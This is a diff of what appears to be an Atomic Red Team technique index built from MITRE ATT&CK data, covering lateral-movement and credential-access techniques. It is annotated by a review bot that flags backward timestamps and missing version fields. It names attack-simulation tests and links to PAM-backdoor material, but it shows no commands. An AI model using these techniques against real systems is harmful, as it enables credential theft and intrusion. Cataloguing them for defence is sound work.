- 'Process: Process Creation'
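Review bot: Replacing the platform literal "Office 365" with "Office Suite" changes the value any platform filter matches on; confirm that nothing downstream still keys on "Office 365" (the same consolidation recurs across this diff, with "Google Workspace" and "Azure AD" folded into "Office Suite" and "Identity Provider"), otherwise those filters will silently return nothing. The `x_mitre_version` bump from '1.4' to '1.5' is the expected companion to a platform change.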
@@ -50019,9 +50707,8 @@ lateral-movement:
url: https://rewtin.blogspot.ch/2017/11/abusing-user-shares-for-efficient.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1021.004:
technique:
@@ -50072,7 +50759,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.004
atomic_tests:
- name: ESXi - Enable SSH via PowerCLI
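Review bot: T1021.004 drops `spec_version: '2.1'` but keeps `x_mitre_attack_spec_version: 3.1.0`, while the surrounding objects in this diff are bumped to 3.2.0 in the same pass. If 3.1.0 is what upstream reports for an object that was not modified, that is fine, but please confirm this is the upstream value and not an object the regeneration missed, since the two kinds of edit are otherwise indistinguishable here.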
@@ -50179,7 +50865,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1091
atomic_tests: []
T1021.008:
@@ -50250,7 +50935,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1563.001:
technique:
@@ -50287,7 +50971,7 @@ lateral-movement:
url: https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident
description: Hodgson, M. (2019, May 8). Post-mortem and remediations for Apr
11 security incident. Retrieved February 17, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-23T23:11:24.682Z'
name: SSH Hijacking
description: |-
Adversaries may hijack a legitimate user's SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.
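Review bot: The `modified` timestamp for T1563.001 moves backward, from '2021-04-29T14:49:39.188Z' to '2020-03-23T23:11:24.682Z'. A regenerated object should not be older than the one it replaces; this suggests the object was pulled from an older snapshot rather than from the same source as the rest of the diff. Verify against upstream before merging.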
@@ -50318,8 +51002,6 @@ lateral-movement:
- root
x_mitre_system_requirements:
- SSH service enabled, trust relationships configured, established connections
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1021.002:
technique:
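Review bot: This hunk removes `x_mitre_attack_spec_version: 2.1.0` from T1563.001 with no replacement, so the object loses the field entirely, whereas every other object in this diff is either bumped to 3.2.0 or left at 3.1.0. Dropping `spec_version` is consistent with the rest of the change, but the attack-spec field going missing looks like a stale copy of the object; it should end up at 3.2.0 like its neighbours.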
@@ -50402,12 +51084,11 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.002
atomic_tests: []
T1550:
technique:
- modified: '2024-04-12T21:18:23.798Z'
+ modified: '2024-10-15T16:09:19.001Z'
name: Use Alternate Authentication Material
description: "Adversaries may use alternate authentication material, such as
password hashes, Kerberos tickets, and application access tokens, in order
@@ -50434,6 +51115,7 @@ lateral-movement:
phase_name: lateral-movement
x_mitre_contributors:
- Blake Strom, Microsoft Threat Intelligence
+ - Pawel Partyka, Microsoft Threat Intelligence
x_mitre_deprecated: false
x_mitre_detection: 'Configure robust, consistent account activity audit policies
across the enterprise and with externally accessible services.(Citation: TechNet
@@ -50451,12 +51133,12 @@ lateral-movement:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Office 365
- SaaS
- - Google Workspace
- IaaS
- Containers
- x_mitre_version: '1.3'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Logon Session: Logon Session Creation'
@@ -50482,14 +51164,13 @@ lateral-movement:
description: NIST. (n.d.). Authentication. Retrieved January 30, 2020.
url: https://csrc.nist.gov/glossary/term/authentication
- source_name: NIST MFA
- description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January
- 30, 2020.
- url: https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication
+ description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved September
+ 25, 2024.
+ url: https://csrc.nist.gov/glossary/term/multi_factor_authentication
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1021:
technique:
@@ -50607,7 +51288,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1563:
technique:
@@ -50661,11 +51341,10 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1021.006:
technique:
- modified: '2023-08-11T15:26:41.941Z'
+ modified: '2024-09-12T15:28:23.398Z'
name: 'Remote Services: Windows Remote Management'
description: |-
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
@@ -50717,14 +51396,13 @@ lateral-movement:
April 27, 2016.
url: https://msdn.microsoft.com/en-us/library/aa394582.aspx
- source_name: Microsoft WinRM
- description: Microsoft. (n.d.). Windows Remote Management. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa384426
+ description: Microsoft. (n.d.). Windows Remote Management. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/winrm/portal
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.006
atomic_tests: []
T1021.003:
@@ -50810,12 +51488,11 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.003
atomic_tests: []
T1550.003:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T15:21:09.330Z'
name: 'Use Alternate Authentication Material: Pass the Ticket'
description: |-
Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
@@ -50835,6 +51512,7 @@ lateral-movement:
x_mitre_contributors:
- Vincent Le Toux
- Ryan Becwar
+ x_mitre_deprecated: false
x_mitre_detection: |-
Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
@@ -50842,7 +51520,6 @@ lateral-movement:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -50858,39 +51535,40 @@ lateral-movement:
id: attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926
created: '2020-01-30T17:03:43.072Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1550/003
external_id: T1550.003
- - source_name: ADSecurity AD Kerberos Attacks
- description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
- Kerberos Attacks. Retrieved June 2, 2016.
- url: https://adsecurity.org/?p=556
- - source_name: GentilKiwi Pass the Ticket
- description: Deply, B. (2014, January 13). Pass the ticket. Retrieved June
- 2, 2016.
- url: http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+ - source_name: CERT-EU Golden Ticket Protection
+ description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
+ April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
+ url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
- source_name: Campbell 2014
description: Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December
4, 2014.
url: http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf
+ - source_name: GentilKiwi Pass the Ticket
+ description: Deply, B. (2014, January 13). Pass the ticket. Retrieved September
+ 12, 2024.
+ url: https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+ - source_name: ADSecurity AD Kerberos Attacks
+ description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
+ Kerberos Attacks. Retrieved June 2, 2016.
+ url: https://adsecurity.org/?p=556
- source_name: Stealthbits Overpass-the-Hash
description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash
Attacks. Retrieved February 4, 2021.
url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
- - source_name: CERT-EU Golden Ticket Protection
- description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
- April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
- url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1550.003
atomic_tests: []
T1021.007:
technique:
- modified: '2023-04-14T22:27:04.095Z'
+ modified: '2024-10-15T15:52:47.255Z'
name: Cloud Services
description: "Adversaries may log into accessible cloud services within a compromised
environment using [Valid Accounts](https://attack.mitre.org/techniques/T1078)
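Review bot: The substantive change in this reference hunk is the "GentilKiwi Pass the Ticket" URL being replaced with a web.archive.org snapshot (20210515214027) and a new Retrieved date, which is the right fix for a source that no longer resolves; the other entries are only reordered. Nit carried over from the old line: the author is Benjamin Delpy, and "Deply, B." is misspelled in both the removed and the re-added entry, so it is an upstream typo rather than one introduced here. The added `revoked: false`, the 3.2.0 bump and the added `x_mitre_modified_by_ref` match the pattern used elsewhere in the diff.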
@@ -50915,12 +51593,11 @@ lateral-movement:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- - Azure AD
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
type: attack-pattern
@@ -50934,13 +51611,12 @@ lateral-movement:
external_id: T1021.007
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1072:
technique:
- modified: '2024-04-12T03:40:37.954Z'
+ modified: '2024-09-25T20:49:37.227Z'
name: Software Deployment Tools
description: "Adversaries may gain access to and use centralized software suites
installed within an enterprise to execute commands and move laterally through
@@ -50957,7 +51633,7 @@ lateral-movement:
on cloud-hosted instances, as well as the execution of arbitrary commands
on on-premises endpoints. For example, Microsoft Configuration Manager allows
Global or Intune Administrators to run scripts as SYSTEM on on-premises devices
- joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
+ joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001)
to communicate back to adversary owned infrastructure.(Citation: Mitiga Security
Advisory: SSM Agent as Remote Access Trojan)\n\nNetwork infrastructure devices
@@ -51005,7 +51681,7 @@ lateral-movement:
- Windows
- Network
- SaaS
- x_mitre_version: '3.0'
+ x_mitre_version: '3.1'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Application Log: Application Log Content'
@@ -51038,7 +51714,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1072
atomic_tests: []
T1210:
@@ -51077,7 +51752,7 @@ lateral-movement:
description: National Vulnerability Database. (2017, September 24). CVE-2014-7169
Detail. Retrieved April 3, 2018.
source_name: NVD CVE-2014-7169
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-02-24T15:06:46.006Z'
name: Exploitation of Remote Services
description: |-
Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.
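Review bot: Same regression as T1563.001 earlier in this diff: the `modified` timestamp for T1210 moves backward, from '2022-05-11T14:00:00.188Z' to '2022-02-24T15:06:46.006Z'. Please check which upstream snapshot this object came from; a backward-moving timestamp usually means the source data is older than what was already committed.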
@@ -51111,12 +51786,10 @@ lateral-movement:
and goal, the system and exploitable service may need to be remotely accessible
from the internal network.
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1534:
technique:
- modified: '2024-02-16T13:09:39.215Z'
+ modified: '2024-10-15T15:59:36.741Z'
name: Internal Spearphishing
description: |-
After they already have access to accounts or systems within the environment, adversaries may use internal spearphishing to gain access to additional information or compromise other users within the same organization. Internal spearphishing is multi-staged campaign where a legitimate account is initially compromised either by controlling the user's device or by compromising the account credentials of the user. Adversaries may then attempt to take advantage of the trusted internal account to increase the likelihood of tricking more victims into falling for phish attempts, often incorporating [Impersonation](https://attack.mitre.org/techniques/T1656).(Citation: Trend Micro - Int SP)
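Review bot: T1210 loses `x_mitre_attack_spec_version: 2.1.0` outright (removed together with `spec_version`, nothing added), so after this change the object carries no attack-spec version at all. Every other object in the diff keeps or bumps that field; suggest setting it to 3.2.0 here for consistency, or documenting why this object is exempt.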
@@ -51144,10 +51817,9 @@ lateral-movement:
- Windows
- macOS
- Linux
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
@@ -51177,7 +51849,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1570:
technique:
@@ -51239,12 +51910,11 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1570
atomic_tests: []
T1550.004:
technique:
- modified: '2023-09-19T21:26:24.725Z'
+ modified: '2024-10-15T16:11:15.657Z'
name: Web Session Cookie
description: |-
Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
@@ -51268,11 +51938,10 @@ lateral-movement:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- IaaS
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Web Credential: Web Credential Usage'
@@ -51297,9 +51966,8 @@ lateral-movement:
url: https://wunderwuzzi23.github.io/blog/passthecookie.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1563.002:
technique:
@@ -51359,7 +52027,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1563.002
atomic_tests: []
T1550.002:
@@ -51414,7 +52081,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1550.002
atomic_tests: []
T1021.001:
@@ -51482,12 +52148,11 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.001
atomic_tests: []
T1550.001:
technique:
- modified: '2024-04-12T21:18:28.848Z'
+ modified: '2024-10-15T15:38:11.583Z'
name: Application Access Token
description: "Adversaries may use stolen application access tokens to bypass
the typical authentication process and access restricted accounts, information,
@@ -51544,6 +52209,7 @@ lateral-movement:
- Dylan Silva, AWS Security
- Jack Burns, HubSpot
- Blake Strom, Microsoft Threat Intelligence
+ - Pawel Partyka, Microsoft Threat Intelligence
x_mitre_deprecated: false
x_mitre_detection: 'Monitor access token activity for abnormal use and permissions
granted to unusual or suspicious applications and APIs. Additionally, administrators
@@ -51554,13 +52220,12 @@ lateral-movement:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- Containers
- IaaS
- - Azure AD
- x_mitre_version: '1.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.7'
x_mitre_data_sources:
- 'Web Credential: Web Credential Usage'
x_mitre_defense_bypassed:
@@ -51619,7 +52284,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
credential-access:
T1557:
@@ -51713,49 +52377,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Scott Knight, @sdotknight, VMware Carbon Black
- - George Allen, VMware Carbon Black
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
- type: attack-pattern
- created: '2020-06-26T04:01:09.648Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.003
- url: https://attack.mitre.org/techniques/T1556/003
- - source_name: Apple PAM
- url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
- description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
- Retrieved June 25, 2020.
- - source_name: Man Pam_Unix
- url: https://linux.die.net/man/8/pam_unix
- description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
- 25, 2020.
- - source_name: Red Hat PAM
- url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
- description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
- (PAM). Retrieved June 25, 2020.
- - source_name: PAM Backdoor
- url: https://github.com/zephrax/linux-pam-backdoor
- description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
- 25, 2020.
- - source_name: PAM Creds
- url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
- description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
- PAM backdoors & DNS requests. Retrieved June 26, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-21T16:19:55.082Z'
name: 'Modify Authentication Process: Pluggable Authentication Modules'
description: |-
Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so
, which retrieves, sets, and verifies account authentication information in /etc/passwd
and /etc/shadow
.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
@@ -51770,20 +52395,57 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Scott Knight, @sdotknight, VMware Carbon Black
+ - George Allen, VMware Carbon Black
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor PAM configuration and module paths (ex: /etc/pam.d/
) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Logon Session: Logon Session Creation'
- x_mitre_permissions_required:
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+ created: '2020-06-26T04:01:09.648Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/003
+ external_id: T1556.003
+ - source_name: Apple PAM
+ description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+ Retrieved June 25, 2020.
+ url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+ - source_name: Man Pam_Unix
+ description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+ 25, 2020.
+ url: https://linux.die.net/man/8/pam_unix
+ - source_name: PAM Creds
+ description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+ PAM backdoors & DNS requests. Retrieved June 26, 2020.
+ url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+ - source_name: Red Hat PAM
+ description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+ (PAM). Retrieved June 25, 2020.
+ url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+ - source_name: PAM Backdoor
+ description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+ 25, 2020.
+ url: https://github.com/zephrax/linux-pam-backdoor
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.003
atomic_tests:
- name: Malicious PAM rule
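Review bot: `x_mitre_permissions_required: - root` is dropped from T1556.003 with no replacement, while the same field is retained on T1563.001 elsewhere in this diff; confirm that upstream really removed it for this object rather than it being lost in the reshuffle. Because the whole object is reordered, the real edits are easy to miss: added `x_mitre_deprecated: false` and `revoked: false`, `x_mitre_version` '2.0' to '2.1', attack spec 3.2.0, and the new `modified` timestamp. Separately, the context lines show the description and detection text broken around `pam_unix.so`, `/etc/passwd`, `/etc/shadow` and `/etc/pam.d/`; under a `|-` block scalar those breaks become literal newlines in the rendered text. That is pre-existing, but worth fixing at the source.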
@@ -51985,7 +52647,6 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1056.001
atomic_tests:
- name: Living off the land Terminal Input Capture on Linux with pam.d
@@ -52199,7 +52860,7 @@ credential-access:
'
T1110.001:
technique:
- modified: '2023-10-16T16:57:41.743Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Brute Force: Password Guessing'
description: |-
Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts.
@@ -52228,6 +52889,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- Mohamed Kmal
@@ -52239,18 +52901,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Application Log: Application Log Content'
@@ -52277,9 +52939,6 @@ credential-access:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1110.001
atomic_tests:
- name: SUDO Brute Force - Debian
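Review bot: Of the three keys removed here, only `spec_version` is actually gone: `x_mitre_attack_spec_version: 3.2.0` and `x_mitre_modified_by_ref` are re-added higher up in the T1110.001 object (after `kill_chain_phases` and after `x_mitre_is_subtechnique`). The net change is therefore a key reorder, but the resulting order differs from the neighbouring objects, where both keys sit directly after `object_marking_refs`; if the generator is meant to produce a stable key order, this object went through a different path and should be normalised.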
@@ -52412,7 +53071,7 @@ credential-access:
'
T1003:
technique:
- modified: '2024-04-18T23:47:41.667Z'
+ modified: '2024-10-15T15:12:43.034Z'
name: OS Credential Dumping
description: |
Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. Credentials can be obtained from OS caches, memory, or structures.(Citation: Brining MimiKatz to Unix) Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.
@@ -52536,12 +53195,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003
atomic_tests: []
T1539:
technique:
- modified: '2024-04-16T12:56:56.861Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Steal Web Session Cookie
description: |-
An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.
